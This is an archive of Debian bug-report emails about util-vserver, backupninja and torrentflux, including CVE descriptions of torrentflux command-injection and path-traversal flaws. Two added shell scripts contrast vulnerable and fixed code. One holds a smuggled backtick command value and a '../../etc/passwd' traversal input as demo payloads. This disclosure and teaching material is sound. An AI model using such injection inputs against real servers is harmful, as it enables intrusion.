code execution hence foot-dragging on my part. It is only a XSS that is 
specific to usage of some code in rails. There are ways a web 
application can treat all input data and sanitize it without relying on 
rails/ruby to do it with magic functions.

Actually, Lenny *does* matter in terms of security, that is the whole
point of the testing security team. 

Micah





Bug#445054: added NEWS.Debian information about this

2007-10-24 Thread Micah Anderson

I have added NEWS.Debian information about this change to the svn
repository for the package. 

In order to fix this, please migrate to static context IDs, to do this
simply stop your guest, echo an unique number to
/etc/vservers/guest/context and then start your guest.

Micah






Bug#444798: postinst removes conffiles

2007-10-22 Thread Micah Anderson

The postinst script unconditionally removes /etc/vserver{,s}.conf on
every configuration.  Since the configuration is apparently preserved
by sourcing the files and creating a symlink in place of their
content, this is okay.  However the package both includes and removes
the conffile vservers.conf which is not allowed.

I've removed in svn the conffile from the package. The functionality 
has been provided by /etc/defaults/util-vserver.

It is also not okay if VSERVERS_ROOT and VSERVER_ROOT aren't the
only things that were ever specified in those files, or if something
else *could* have been (legitimately?) added there.  Preferably the
files aren't removed if anything else is there:

If you can find a real world example of this, I'd love to hear it, but
what you are talking about here is something like a potato migration to 
sarge, the oldest tarball I could find of util-vserver only had in this 
file things that have been moved to the defaults file.

 The same problem with these removals:

 |# Remove old startup scripts
 |rm -f /etc/init.d/vservers-legacy
 |rm -f /etc/init.d/vservers-default
 |rm -f /etc/init.d/vprocunhide
 |rm -f /etc/init.d/rebootmgr

These are startup scripts that have been rolled into one startup script,
not configuration files.

 |rm -f /etc/default/util-vservere

This was a legacy mistake and never had anything in it.

 There's another problem too: removal of the symlinks isn't preserved:
 run.rev vdirbase

Can you be a little more specific about this issue in a separate bug
report?

Micah






Bug#444572: Any word on this?

2007-10-17 Thread Micah Anderson

I haven't been able to install hpijs for over two weeks now (this bug is
18 days old alone), which is making printing really difficult :)

Usually a binNMU doesn't take this long, is there another issue holding
things up?

Micah






Bug#432410: util-vserver: Please upload the package

2007-08-22 Thread Micah Anderson
* Raphael Hertzog [EMAIL PROTECTED] [070822 02:57]:
 Package: util-vserver
 Version: 0.30.213-1
 Followup-For: Bug #432410
 
 This bug is marked as pending. Can you upload it?

Unfortunately, I cannot because I am getting some build errors with the
newer build suite in sid. Once these are worked out, I will be able to upload.

 A bin-nmu of this package has been scheduled to fix a problem
 related to symbol hashing (the package has been built with a bad version
 of gcc) and the bin-nmu failed due to this bug.

Can you say more about this?

 When sbuild has an alternative, IIRC it considers only the first choice
 which in that case was modutils. Simply removing the choice is the
 sensible thing to do since modutils is no more available...

Yes, this has been done in the repository some time ago.

Micah





Bug#432410: util-vserver - FTBFS: Build-depends on removed package: modutils

2007-07-11 Thread Micah Anderson

Ola,

The modutils package has been removed from sid and lenny as it is a
package that supports 2.4 kernels, which are no longer a part of any
Debian release (including Etch). 

Modutils functionality is now provided by module-init-tools, however I
am not sure why it is needed for util-vserver, do you?

Additionally, the dependency is: modutils|module-init-tools so I am not
sure why the build failed.

Micah

* Bastian Blank [EMAIL PROTECTED] [070709 12:55]:
 Package: util-vserver
 Version: 0.30.213-1+b1
 Severity: serious
 
 There was an error while trying to autobuild your package:
 
  Automatic build of util-vserver_0.30.213-1+b1 on lxdebian.bfinv.de by 
  sbuild/s390 98
 [...]
  E: Package modutils has no installation candidate
  Package modutils is not available, but is referred to by another package.
  This may mean that the package is missing, has been obsoleted, or
  is only available from another source
  apt-get failed.
  Package installation failed
 
 





Bug#403661: torrentflux: fails to install with error code 10

2006-12-19 Thread Micah Anderson


Remi Vanicat wrote:
 2006/12/19, Cameron Dale [EMAIL PROTECTED]:
 On 12/18/06, Remi Vanicat [EMAIL PROTECTED] wrote:
  $ DEBCONF_DEBUG=developer dpkg --configure --pending
  Setting up torrentflux (2.1-7) ...
  debconf (developer): frontend started
  debconf (developer): frontend running, package name is torrentflux
  debconf (developer): starting /var/lib/dpkg/info/torrentflux.config
 configure
  debconf (developer): -- CAPB backup
  debconf (developer): -- 0 multiselect escape backup
  debconf (developer): -- REGISTER dbconfig-common/database-type
 torrentflux/database-type
  debconf (developer): -- 10 No such template,
 dbconfig-common/database-type
  dpkg: error processing torrentflux (--configure):
   subprocess post-installation script returned error exit status 10
  Errors were encountered while processing:
   torrentflux

 This is looking like a dbconfig-common problem to me, so I'm going to
 forward it to their list to see what they say. I'm having trouble
 reproducing this though. Could you describe what steps you took to get
 this error? Was dbconfig-common installed before installing
 torrentflux, or were they both in the same install?
 
 at the first installation (the one of 2.6) both were installed at the
 same time. But dbconfig-common has been installed with no problem, and
 I've tried to purge torrentflux and to reinstall it, and it failed.

I just created a sid chroot and attempted to install torrentflux, I did
not encounter this problem.

I tried a few different failure scenarios (mysql-client not available,
mysql-server not installed, database password incorrect, database server
not running) and they all worked fine.

micah






Bug#402679: backupninja: mysql handler overwrites existing backups even if mysqldump fails

2006-12-12 Thread Micah Anderson

Hi,

Joel Fuster wrote:
 Package: backupninja
 Version: 0.9.4-4
 Severity: critical
 Justification: causes serious data loss
 
 
 The mysql backup handler happily overwrites your existing sql.gz files with
 empty tarballs even in situations such as:
 
 1) mysqldump does not exist
 2) mysql is not running
 
 ...etc.  This just bit me when #2 happened due to a crash in mysql which
 involved corrupted data.  Fortunately I have multiple snapshots of the
 sql.gz files...
 
 It looks like this might only happen when you specify the names of the
 databases you wish to back up.  Also, I have only tested this using the
 mysqldump method.

This only occurs when you specify databases and you have compress=no,
mysqld isn't running or mysqldump doesn't exist. This is a pretty unique
combination of events!

Backupninja is designed with the expectation that the backups that you
are making of your databases are being backed up to another system or
another disk using one of the handlers such as rdiff, duplicity, rsnap,
dup, etc. It is expected that the mysqldumps that are made in your
backup directory are not the end of the backup, but rather these are
shipped off in the remainder of the process. Although I agree it's a bad
situation to be in to create a zero-byte mysql dump, I am hesitant to
agree that this causes serious data loss. Using that logic, you could
claim that backupninja causes serious data loss when you delete
everything from your database and then you do a backup of an empty
database, or likewise.

In any case, I don't like nasty backup surprises, so I've prepared a
fix, and will ask the release managers to have this fix allowed into etch.

Thanks,
Micah



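The failure mode in the report above (a dump command that cannot run, leaving a zero-byte file where the last good dump was) comes from one shell idiom: redirecting the dump straight onto the destination file. The script below is an added example and is not backupninja's mysql handler or its fix; it shows the clobbering pattern next to a write-temp-verify-rename pattern that keeps the previous dump intact. The MYSQLDUMP variable, the fake_* stand-ins for a dead server and a working one, and the file names are constructed for the demo.

```shell
#!/bin/sh
# Added example, not backupninja's handler. Shows why writing a dump
# straight onto the previous backup file loses that backup whenever the
# dump command fails, and the write-temp-verify-rename pattern that
# keeps the last good copy. MYSQLDUMP is an assumption: the command to
# run; it defaults to mysqldump and the demo swaps in fakes.
: "${MYSQLDUMP:=mysqldump}"

# Constructed stand-ins for the failure modes in the bug report.
fake_dead_server() {
    echo "mysqldump: Got error: 2002: Can't connect to local MySQL server" >&2
    return 2
}
fake_live_server() {
    echo "-- constructed dump of $1"
    echo "CREATE TABLE t (id INT);"
}

# VULNERABLE: the shell truncates $out before the command even starts,
# so a missing binary (exit 127) or a dead server leaves a 0-byte file
# where the last good dump was. Nothing checks the exit status either.
unsafe_dump() {
    db=$1; out=$2
    "$MYSQLDUMP" "$db" > "$out"
}

# FIXED: dump into a temp file beside the target, require exit 0 and a
# non-empty result, then rename. rename(2) within one filesystem is
# atomic, so $out is always either the old dump or the complete new one.
safe_dump() {
    db=$1; out=$2
    dir=$(dirname "$out")
    tmp=$(mktemp "$dir/.$(basename "$out").XXXXXX") || return 1
    if ! "$MYSQLDUMP" "$db" > "$tmp"; then
        echo "dump of $db failed; keeping previous $out" >&2
        rm -f "$tmp"; return 1
    fi
    if [ ! -s "$tmp" ]; then
        echo "dump of $db is empty; keeping previous $out" >&2
        rm -f "$tmp"; return 1
    fi
    mv -f "$tmp" "$out"
}

# Demo: a "previous" backup, then both patterns against a dead server.
demo() {
    work=$(mktemp -d) || return 1
    printf '%s\n' '-- last good dump' > "$work/app.sql"
    MYSQLDUMP=fake_dead_server
    unsafe_dump app "$work/app.sql" 2>/dev/null
    echo "unsafe: $(wc -c < "$work/app.sql" | tr -d ' ') bytes of the old dump remain"
    printf '%s\n' '-- last good dump' > "$work/app.sql"
    safe_dump app "$work/app.sql" 2>/dev/null || true
    echo "safe:   $(wc -c < "$work/app.sql" | tr -d ' ') bytes of the old dump remain"
    rm -rf "$work"
}
demo
```

The same shape applies to the compressed case: pipe the dump through gzip into the temp file and test the pipeline's status (`set -o pipefail` where the shell has it, or check the dump's status separately) before the rename, since `mysqldump | gzip > file` reports only gzip's exit status.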


Bug#400582: CVEs assigned

2006-12-06 Thread Micah Anderson

Hi Cameron and Stefan,

Stefan requested that I request CVE IDs for the torrentflux issues from
Mitre, which I have done, please see below for these. It would be good
to pass these upstream and include them in any changelogs that fix these
issues that haven't been uploaded already.

micah

 New torrentflux issue has come up, reference URL
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

 Proposed text:
 A potential remote command execution has been found in torrentflux, a
 php-based torrent management software. Arbitrary code execution in
 metaInfo.php allows an authenticated user to execute remote shell
 commands on the server when $cfg[enable_file_priority] is set to 'false'.

I've created 4 candidates - 3 for the Secunia advisory published in
November, and one for this particular issue.  See below.

==
Name: CVE-2006-6328
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6328
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

Directory traversal vulnerability in index.php for TorrentFlux 2.2
allows remote attackers to create or overwrite arbitrary files via ..
(dot dot) sequences in the alias_file parameter.


==
Name: CVE-2006-6329
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6329
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote attackers to delete files
by specifying the target filename in the delfile parameter.


==
Name: CVE-2006-6330
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6330
Reference: MISC:http://www.milw0rm.com/exploits/2786
Reference: SECUNIA:22880
Reference: URL:http://secunia.com/advisories/22880
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582

index.php for TorrentFlux 2.2 allows remote registered users to
execute arbitrary commands via shell metacharacters in the kill
parameter.


==
Name: CVE-2006-6331
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6331
Reference:
CONFIRM:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=%23400582
Reference:
MISC:http://bugs.debian.org/cgi-bin/bugreport.cgi/11_missed_security_fixes.dpatch?bug=400582;msg=71;att=1

metaInfo.php in TorrentFlux 2.2, when $cfg[enable_file_priority] is
false, allows remote attackers to execute arbitrary commands via shell
metacharacters (backticks) in the torrent parameter to details.php.






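Two of the candidates above describe the same defect class: a request parameter (kill, torrent) is interpolated into a command string that a shell then parses, so backticks or other metacharacters in it run as commands; the alias_file one is a request-controlled file name that reaches the filesystem unconfined. The script below is an added example, not torrentflux code and not its patch; it reproduces the interpolation mistake with a harmless `echo` standing in for the real process-control command, then shows the two fixes (allow-list the value, pass it as its own argument) and a confining check for file names. The function names and the base directory are illustrative assumptions.

```shell
#!/bin/sh
# Added example (not torrentflux code): how shell metacharacters in a
# request parameter become command execution, and how to close both
# that hole and an alias_file-style path traversal. Function names and
# the base directory are illustrative assumptions.

# VULNERABLE: the parameter is pasted into a command string, so the
# shell that parses that string honours backticks, ';', '|' and so on.
# 'echo' stands in for the process-control command so the demo is
# harmless to run.
unsafe_show_pid() {
    sh -c "echo pid=$1"
}

# FIXED: (1) allow-list the value; a pid is digits only, nothing else;
# (2) hand the value to the command as its own argument, never via a
# string the shell re-parses. (2) alone neutralises metacharacters,
# but (1) also stops empty or non-numeric values reaching the tool.
safe_show_pid() {
    case $1 in
        ''|*[!0-9]*) echo "rejected pid: $1" >&2; return 1 ;;
    esac
    sh -c 'echo "pid=$1"' sh "$1"
}

# Path traversal: the request controls a file name the application
# writes to. Confine it to a bare, non-hidden name from a small
# character set inside a fixed directory; '..', '/' and anything else
# unexpected are rejected outright rather than "cleaned up".
safe_alias_path() {
    base=$1; name=$2
    case $name in
        ''|*/*|.*) return 1 ;;
        *[!A-Za-z0-9._-]*) return 1 ;;
    esac
    printf '%s/%s\n' "$base" "$name"
}

# Demo with a constructed, harmless payload.
payload='1234 `echo INJECTED`'
echo "unsafe: $(unsafe_show_pid "$payload")"
safe_show_pid "$payload" || echo "safe:   refused to run"
safe_alias_path /var/lib/torrentflux '../../etc/passwd' || echo "traversal rejected"
safe_alias_path /var/lib/torrentflux 'example.torrent'
```

The order matters in the safe version: validation happens before any command is built, and the value travels as argv rather than as text, so even a future change of the command cannot reintroduce shell parsing of the parameter.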

Bug#393285: Yep

2006-10-15 Thread Micah Anderson



Just wanted to agree with Moritz, I filed the bug to have it removed bug
#390951.

Micah




